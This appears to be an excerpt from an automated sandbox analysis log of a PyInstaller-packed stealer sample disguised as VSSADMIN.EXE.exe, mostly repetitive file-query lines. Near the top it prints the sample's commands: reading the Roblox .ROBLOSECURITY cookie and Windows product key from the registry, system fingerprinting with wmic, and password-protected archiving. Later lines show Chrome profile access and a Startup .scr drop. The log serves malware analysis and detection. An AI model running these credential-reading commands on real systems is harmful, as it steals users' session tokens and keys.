              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE77B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,59_2_00007FF6EE77B340
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
